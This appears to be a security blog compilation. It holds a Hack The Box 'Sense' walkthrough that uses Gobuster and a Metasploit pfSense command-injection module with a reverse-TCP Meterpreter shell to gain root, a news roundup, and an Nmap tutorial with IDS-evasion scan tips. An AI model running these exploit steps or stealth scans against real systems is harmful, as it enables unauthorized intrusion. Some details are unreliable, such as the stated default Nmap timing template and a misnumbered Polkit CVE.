HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's ip address in our web browser. Upon inspection we can see a login page for pfSense, an open-source firewall software based in FreeBSD. We can complete a quick Google search for the default credentials for pfSense and find the default username is "admin" and the password is "pfsense". When trying these default credentials, we are notified they are not correct. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice a /systems-users.txt, highlighted above in orange. This file is interesting because there could be user login information within the text file. We can view this file by navigating to the path on the web server by using our web browser. On my spawned HTB machine it would be https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!

Let's fire-up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see option #3 shows a module for an injection attack granting authentication. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set the RHOSTS to the target ip address, the USERNAME to "rohit", and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit using "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is successful, we can use the "getuid" command to see we now have root access to the machine! You can now navigate through the target system to obtain the root and user .txt flags.

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted for 65 seconds. The attackers launched the attack by exploiting a network of vulnerable devices, including Asus routers and Mikrotik systems. This attack is the largest publicly recorded DDoS attack ever observed.

In comparison to previous large-scale DDoS attacks, this attack stands out due to its volume and duration. DDoS attacks work by overwhelming a target server with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign targeting Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely infected millions of servers and caused significant disruption. Researchers believe perfctl has been active for at least three years, exploiting vulnerabilities in Polkit (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

There is a new tactic used by FIN7 hackers to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. These arrests included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.

Nmap Basics for Penetration Testing

          ___.-------.___
      _.-' ___.--;--.___ `-._
   .-' _.-'  /  .+.  \  `-._ `-.
 .' .-'      |-|-o-|-|      `-. `.
(_ <O__      \  `+'  /      __O> _)
  `--._``-..__`._|_.'__..-''_.--'
        ``--._________.--''

Nmap, short for Network Mapper, is a free and open-source tool widely used for network discovery and security auditing. Nmap utilizes raw IP packets in innovative ways to gather information about a network. It can identify available hosts, running services (including application name and version), operating systems, firewalls or packet filters in use, and many other details. Designed for rapid scanning of large networks, Nmap also works effectively for single hosts.

Network administrators rely on Nmap for various tasks, including creating network inventories, managing service upgrades, and monitoring uptime of hosts and services, while hackers may utilize it for enumeration i.e. identifying open ports running services that may be exploitable.

Nmap is available for most operating systems but is included with the Kali Linux distro. Remember to replace the placeholder ip address with your target ip address. You can also test this out by scanning the url: scanme.nmap.org. Let's start off with a basic Nmap scan. We can scan using an ip address or a host name i.e. scanme.nmap.org:

nmap 192.168.1.1

We can also scan a list of network/host targets within a text file using the following commands where "ip_list.txt" is the path to the text file.

nmap -iL ip_list.txt 

When performing a penetration test on a network, we may want to perform a ping sweep scan, which pings all available hosts on a network by sending ICMP packets and returns the live hosts. Conducting a ping sweep is a crucial part of identifying active hosts on a network and lays the groundwork for a penetration test.

nmap -sn 192.168.0.0/24

Once we have the list of live hosts, we can then do port scans on the individual hosts. Note the "/24" addition to the ip address. This sets the ip address range. It will send an ICMP echo request to every ip address in the network from 192.168.0.1 to 192.168.0.255.

Nmap defaults to scanning the 1000 most commonly used ports. Port specification and scan order refer to the process of selecting which ports to scan during network reconnaissance. This is crucial for efficient scanning as it allows you to exclude irrelevant ports and prioritize the scan based on port usage frequency.

We can specify ports using the following command:

nmap -p 22,80,443 192.168.1.1

We can also scan for the operating system. This information helps pinpoint vulnerabilities specific to the operating system, enabling more effective attacks on the target system. We can use "-O" to enable OS detection.

nmap -O 192.168.1.1

What if we want to detect the services being run on open ports on the network? The service/version detection feature in Nmap provides valuable insights into the target system, enabling you to identify vulnerabilities and weaknesses on those ports. This option can be enabled by using "-sV".

nmap -sV 192.168.1.1

With the returned information, we can run a query using something like  searchsploit for possible exploits for these services.

One of the most popular scans used is the SYN scan. A SYN scan involves sending an SYN packet to the target host and monitoring for a response. If the target responds with an SYN/ACK packet, the port is open; if it responds with an RST packet, the port is closed. This half-open scan technique, which doesn't complete the full TCP three-way handshake, is fast and, most importantly, stealthy, ideal for mapping large networks.

nmap -sS 192.168.1.1

Being stealthy is an important part of penetration testing. Some firewalls and Intrusion Detection System (IDS) solutions may temporarily block ip addresses that exhibit unusual network activity, such as high traffic volumes or sending network packets to multiple hosts in a systematic manner. We can mitigate these risks by using certain commands that effect the scans order and timing.

We can add the "-T" option to effect the scans timing template. By default, Nmap uses the "-T2" timing template but we can slow the scan down by using the "-T1" or "-T0" timing templates. These will slow down the scan process but will minimize the impact on the network and prevent triggering any alerts.

nmap -T1 192.168.0.0/24

You can also slow down an Nmap scan using delay. Use the "--scan-delay" option and specify the desired delay time in seconds.

nmap --scan-delay 3s 192.168.0.0/24

Let's change the order of targets we scan. Nmap's --randomize-hosts option can help you randomize your scans, making them less predictable and harder to detect by security.

nmap --randomize-hosts 192.168.0.0/24

One of the most powerful features of Nmap is it's ability to run scripts. The Nmap Script Engine (NSE) are scripts written in the programming language, Lua.

For example, you can run the following command that runs the "http-headers" script which pulls the HTTP headers configured on the target webserver.

nmap --script http-headers scanme.nmap.org

As a penetration tester, you may want to run the "vulners" script which automatically lists the vulnerabilities on a target using a CVE database.

nmap --script vulners 192.168.1.1

There are hundreds of NSE scripts available which you can view here.